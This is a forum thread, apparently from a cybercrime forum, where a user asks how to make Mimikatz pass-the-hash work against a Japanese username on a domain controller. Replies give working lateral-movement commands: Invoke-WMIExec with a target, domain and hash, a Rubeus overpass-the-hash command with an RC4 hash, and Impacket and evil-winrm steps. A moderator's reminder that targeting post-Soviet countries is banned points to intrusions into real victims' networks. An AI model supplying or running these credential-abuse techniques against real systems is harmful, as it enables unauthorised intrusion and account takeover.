PTH without eng words

[TheExample]

Hello everyone,

we trying to use Mimikatz for PTH on a system where the username
is in non-English characters

Has anyone faced this issue with non-English usernames in Mimikatz?
Are there any reliable workarounds or tips to make PTH work on users with Unicode usernames?

 

[TheExample]

?

 

[tenac1ous]

Before we proceed, please confirm that the username in the question does not contain Cyrillic characters.
Note that work focused on post-Soviet countries is regarded as forbidden on this forum, as well as it may and will result in sanctions under our rules.

Have you tried using SID instead of the username?
psgetsid.exe "username" (or use wmic)

Then by having SID you can find out the SAM ASCII account name that can be inserted into the mimikatz.

Another approach would be using Invoke-WMIExec as it supports Unicode better (so does Impacket psexec/smbexec).

Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target 192.168.1.100 -Domain COMPANY -Username "中文用户" -Hash 00000000000000000000000000000000 -Command "cmd.exe /c whoami"

 

[TheExample]

Before we proceed, please confirm that the username in the question does not contain Cyrillic characters.
Note that work focused on post-Soviet countries is regarded as forbidden on this forum, as well as it may and will result in sanctions under our rules.

Have you tried using SID instead of the username?
psgetsid.exe "username" (or use wmic)

Then by having SID you can find out the SAM ASCII account name that can be inserted into the mimikatz.

Another approach would be using Invoke-WMIExec as it supports Unicode better (so does Impacket psexec/smbexec).

Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target 192.168.1.100 -Domain COMPANY -Username "中文用户" -Hash 00000000000000000000000000000000 -Command "cmd.exe /c whoami"

Hi, thanks for your reply. No, this username is Japanese and it is in the DC, but kiwi cannot read it.

 

[9271d6ee]

Consider over-pass-the-hash technique via Rubeus. This way you request a Kerberos TGT using the NTLM hash, and can then do pass-the-ticket (PTT).

Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt

If attacking from Linux, you can use Impacket's getTGT.py script to request a ticket via NTLM, then PTT via evil-winrm for execution.